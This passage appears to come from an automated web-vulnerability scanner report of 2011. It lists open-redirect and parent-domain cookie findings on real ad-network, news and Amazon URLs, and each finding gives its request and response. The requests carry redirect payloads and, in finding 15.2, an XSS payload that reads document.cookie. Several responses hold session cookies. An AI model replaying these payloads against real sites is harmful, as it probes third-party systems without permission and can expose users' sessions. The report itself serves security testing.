The value of the redirect request parameter is used to perform an HTTP redirect. The payload http%3a//aaeb446616965104c/a%3fhttp%3a//search.spotxchange.com/partner%3fadv_id%3d6498%26uid%3d17200647%26img%3dIMG was submitted in the redirect parameter. This caused a redirection to the following URL:

Request

GET /?metric=rsync&p=1001&redirect=http%3a//aaeb446616965104c/a%3fhttp%3a//search.spotxchange.com/partner%3fadv_id%3d6498%26uid%3d17200647%26img%3dIMG HTTP/1.1
Host: t4.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
X-LR-BE: 133
Set-Cookie: lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315106495%3B%7D; expires=Thu, 20-Jan-2039 03:21:35 GMT; path=/; domain=liverail.com
X-LR-TIMESTAMP: 1315106495
X-LR-UID: 17200647
X-LR-SID: 0
X-LR-UA: Chrome/;Windows NT 6.1
Location: http://aaeb446616965104c/a?http://search.spotxchange.com/partner?adv_id=6498&uid=17200647&img=IMG
Content-type: text/html
Content-Length: 0
Connection: close
Date: Sun, 04 Sep 2011 03:21:35 GMT
Server: lighttpd/1.4.28


14.31. http://www.dnaindia.com/redirect [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /redirect

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//a1ea2f08d33059671/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

Request

GET /redirect?http%3a//a1ea2f08d33059671/a%3f1=1 HTTP/1.1
Host: www.dnaindia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:29:03 GMT
Location: http://a1ea2f08d33059671/a?1=1
Server: Apache
Vary: Accept-Encoding
Content-Length: 562
Connection: Close

<html>

<head>
<title>DNA - Daily News & Analysis</title>
<META NAME="Googlebot" CONTENT="nofollow">
<META HTTP-EQUIV="refresh" CONTENT="3;url=http://a1ea2f08d33059671/a?1=1">
</head>

<body>
...[SNIP]...

14.32. http://www.wtp101.com/casale_sync [cm_callback_url parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /casale_sync

Issue detail

The value of the cm_callback_url request parameter is used to perform an HTTP redirect. The payload http%3a//a5c4388a4176c28b9/a%3fhttp%3a//r.casalemedia.com/rum was submitted in the cm_callback_url parameter. This caused a redirection to the following URL:

Request

GET /casale_sync?cm_dsp_id=2&cm_user_id=qPptfUPS1JUAAD6emfQAAAAa&cm_callback_url=http%3a//a5c4388a4176c28b9/a%3fhttp%3a//r.casalemedia.com/rum HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 03:06:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://a5c4388a4176c28b9/a?http://r.casalemedia.com/rum&cm_dsp_id=2&external_user_id=c4b14ff6-4fe9-48f2-b970-fb97df83f91f
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=c4b14ff6-4fe9-48f2-b970-fb97df83f91f; path=/; expires=Tue, 03 Sep 2013 03:06:07 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


15. Cookie scoped to parent domain  previous  next
There are 164 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


15.1. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msite.martiniadnetwork.com
Path:   /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 HTTP/1.1
Host: msite.martiniadnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 1 Jan 2000 00:00:00 GMT
Set-Cookie: MMNBASEID=21041315109410696666828; expires=Fri, 02-Mar-2012 04:15:53 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 04:15:53 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=OZm4QWyytkVQabk8%2BxUQlZ1BCFDpF0B143hZyhKXo%2FeTnfJ8VeEqHnxEY%2BpUbrwvQIFkoA0GM1SvPSYjoQgbJKYRtHkp1DAwQ5ROrVD4dln85T%2F%2FEUg91j%2B0MlVv0Mb1JQodK%2FJd6qGFD1DK3JX8Vb63BN1AMN8G%2Fa%2FjaQ%3D%3D; expires=Fri, 02-Mar-2012 04:15:53 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=6bfe1cd82564d34693d98801e48e7812%5D%5D%3E%3E; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=62; path=/; domain=.martiniadnetwork.com; httponly
Vary: Accept-Encoding
Content-Length: 129
Connection: close
Content-Type: text/html


<script type="text/javascript">
document.write("<img src='" "' style='display: none;' height='1' width ='1' />");
</script>

15.2. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msite.martiniadnetwork.com
Path:   /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 HTTP/1.1
Host: msite.martiniadnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 1 Jan 2000 00:00:00 GMT
Set-Cookie: MMNBASEID=21041315109410696666828; expires=Fri, 02-Mar-2012 04:15:54 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 04:15:54 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=FTuecWELObsEFBwHt3PeLtw8QkdlTIpMuIul9PNXbKLqg%2B5tq%2Fz4tjuh46vnDzKWanGbe2tEapCAtq0fQU2yobLzjvvHAhzaspIjfyci8u%2FX4wzYSZHe0fD7QlVf%2FDuk9ta2Ab2WwulLKtyb8hl%2F7pnsLHixXZ5gib8BFg%3D%3D; expires=Fri, 02-Mar-2012 04:15:54 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=6bfe1cd82564d34693d98801e48e7812%5D%5D%3E%3E; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=77; path=/; domain=.martiniadnetwork.com; httponly
Vary: Accept-Encoding
Content-Length: 129
Connection: close
Content-Type: text/html


<script type="text/javascript">
document.write("<img src='" "' style='display: none;' height='1' width ='1' />");
</script>

15.3. http://msite.martiniadnetwork.com/index/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index/?pid=1000000986802&sid=1000005169510&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&rnd=890733501&ref=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142 HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MMNBASEID=21051315103139790868608; OptOut=no; MMNBASEVAL=cG8IvxHEQGZ7AAQ%2FKkpAKSZQ4bf6EKUegVRojKanLLDe9BVikgcl25tE9iMUzjWnqqMEeqhlz5IdBuUB0MK3B%2FsCMFl%2FfNWhi7CI%2F8jSGRqObm%2FaKwWALRMUAI9drq1rn0ihQUhkYZ0eDBEzTt7rKZZanJWuK%2BsXfErkfA%3D%3D; MMNATTR=6%2Fsptoq4rcqn54lAbIk8LF%2Fw6jXKmlMTnkNsgMEYFzXA9gs%2BC4SMYjcD%2BAGjscVN9gzYKdEkAFwmYicReq5BMRRMpDZDghdUJfcY7cPB5ggAfafqpXCAYwIBp4vEBzDQiijQMpZNuE6Q83ST6zbLFZuFnGP6YgJAWTddEEguv72RhOtelqeiIK9HUXc8ysbiPgi%2BZY6BA8PDPTuwS%2F4kl3GxtOqDY%2BoqCYfu7oIYgZJKAw9avIJ0bnoHjFfW7D96n20aoNZnj7aEqIydyS7GWNzKKjsxnDfQoLiuPSGJLP5fTc%2FW7N2CE5UbmCbv3UeE7P4ie09b1uxpnb0BUZtJP2xPYGr7f9B79LtMJrS7AeUHdU%2B%2BaULygIHL0fTQS2pFF9TCgiCz8u%2BD; MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; MMNSESSIDC=2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=dg1OGlDFQEGBWEfS7tLtvB2icx%2F43QwcZuByc7hC%2FFwpNwg2dcJs16mi0QkZqrufiuALx2jw6cCPE5uyZkG3w6gti9rk94qf4YBDg56Zb3DJpkERIlu9gyMTqr%2B1qet31h2TMOLXTWLXAEmslILn8GHESyuOt3NUKYvzzw%3D%3D; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=IFEW09kJhL%2B4vn52PCYvaTZbe3g92AUd3icRwb8wT0yGEyQ%2FHCSgkxR0S3axnH8iWB6cSzqhcPm%2B8%2Flckb%2B%2BvtS5UUl3AroG8T%2B%2BMFT%2FyHfvAKlQxDC%2B9x0Q%2BpPydeyGBra3LWkVCZo4aOrGwRyVEw16t%2B006q%2BGQp%2Bg0goHUldyWQYRF839l7TaJ%2FrhAHCUPIoAyWZbaTrEF5JnWto%2FoNmkqAAt4n%2Fm4Hd72GSULxEvvWc3h00v4MuQG%2BKJLjiwWF8nQ5YwfNQhp%2BBc%2B9rSQN2KBZ0f%2FK7eFXxuTawHOWNHHcD7XK9F28ZqHNopTljY0R6t5chCPG5b2LlEvD1gN69o2yc6eBEZgllBkIOBANJtUlaCVa7EDc2iWO3ESSzdaDIdKANoLgTP; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=3; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:28:14 GMT
Vary: Accept-Encoding
Content-Length: 1322
Content-Type: text/html


var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farti
...[SNIP]...

15.4. http://optout.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout&nocache=0.6832982 HTTP/1.1
Host: optout.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146; NSC_pqupvu_qppm_iuuq=ffffffff0941323f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; expires=Sat, 31-Aug-2024 11:16:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: optouts=cookies; expires=Sat, 31-Aug-2024 11:16:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: RMOPTOUT=3; expires=Sat, 31-Aug-2024 11:16:14 GMT; path=/; domain=.mookie1.com
Location: /optout/nai/index.php?action=optout&nocache=0.6832982&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.5. http://search.spotxchange.com/vast/2.00/75606  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://search.spotxchange.com
Path:   /vast/2.00/75606

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vast/2.00/75606?VPAID=1&content_page_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2FMy-friend-Ganesha%2Farticleshow%2F9855193.cms&VMaxd=30&linear=1&_rand=7937 HTTP/1.1
Host: search.spotxchange.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTQ5NzczMjkK

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:19:52 GMT
Server: Apache
P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"
Set-Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; expires=Mon, 02-Jan-2012 03:19:52 GMT; path=/; domain=.spotxchange.com
Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Mon, 02-Jan-2012 03:19:52 GMT; path=/; domain=.spotxchange.com
Set-Cookie: session-0=deleted; expires=Sat, 04-Sep-2010 03:19:51 GMT; path=/; domain=.spotxchange.com
Set-Cookie: user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDYzOTIK; expires=Tue, 04-Sep-2012 03:19:52 GMT; path=/; domain=.spotxchange.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 03:19:52 GMT
Cache-Control: no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Content-Length: 67

<?xml version="1.0" encoding="UTF-8" ?>
<VAST version="2.0"></VAST>

15.6. http://www.amazon.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:16 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sun, 04-Sep-2011 04:23:16 GMT
x-amz-id-1: 19A6WP3ZDHGN69NMDWGD
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: WttjoioY2sh+9lVqwvX+MQ2r9X2rIBXb/ay0wwdr2lLUBl2LD2VMSFtd29Gdj24p
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 211142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<!-- oi -->
<script type='text/
...[SNIP]...

15.7. http://www.amazon.com/b  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /b

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Sun, 04 Sep 2011 04:23:35 GMT
Server: Server
x-amz-id-1: 10YG7PBC9G2X0E2YBFHB
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: B2gh2NGkiIjoM7fXpribhv/w7Jst9jbtcB8VXmNGv3+FbrPoGaX9uVyUSP7JMkuX
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 20052


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0_date = new Date();
var ue_t0 = t0_date.getTime();
//--></script>
<script type='text/javascript'><!--
var ue_id = '10YG7PBC9G2X0
...[SNIP]...

15.8. http://www.amazon.com/dp/0307387178  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0307387178

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/0307387178 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:24 GMT
Server: Server
x-amz-id-1: 06V0VK7T640CVMJZMPAD
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 1h6yE7wC1G8+JuE1Y1AtympRDo7XFCIGa8bMXRuR2y3e/Mqpf/5EOYAbk5K5ufGC
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 440636


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0
...[SNIP]...

15.9. http://www.amazon.com/dp/B000QRIGLW  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B000QRIGLW

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B000QRIGLW HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:26 GMT
Server: Server
x-amz-id-1: 03S8EAPH3K6YF11YT9YV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: pnFrqXFVhOgn+/67/Tzl/odSUVfgeUp2Gzj76Ud48X9whwHLThJ0G9B+YIPiCzwB
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
